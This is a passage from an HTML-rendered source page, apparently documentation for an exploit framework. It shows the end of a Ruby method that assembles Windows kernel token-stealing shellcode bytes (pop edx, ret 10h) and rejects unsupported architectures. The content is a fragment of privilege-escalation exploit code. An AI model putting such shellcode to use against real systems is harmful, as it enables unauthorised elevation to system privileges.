</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x5a</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># pop edx # Restores edx
</span> <span class='kw'>if</span> <span class='id identifier rubyid_append_ret'>append_ret</span>
<span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\xc2\x10</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># ret 10h # Away from the kernel!
</span> <span class='kw'>end</span>
<span class='kw'>else</span>
<span class='comment'># if this is reached the issue most likely exists in the exploit module
</span> <span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Unsupported arch for token stealing shellcode</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_fail'>fail</span> <span class='const'>ArgumentError</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Invalid arch</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_tokenstealing'>tokenstealing</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
</div>
</body>
</html>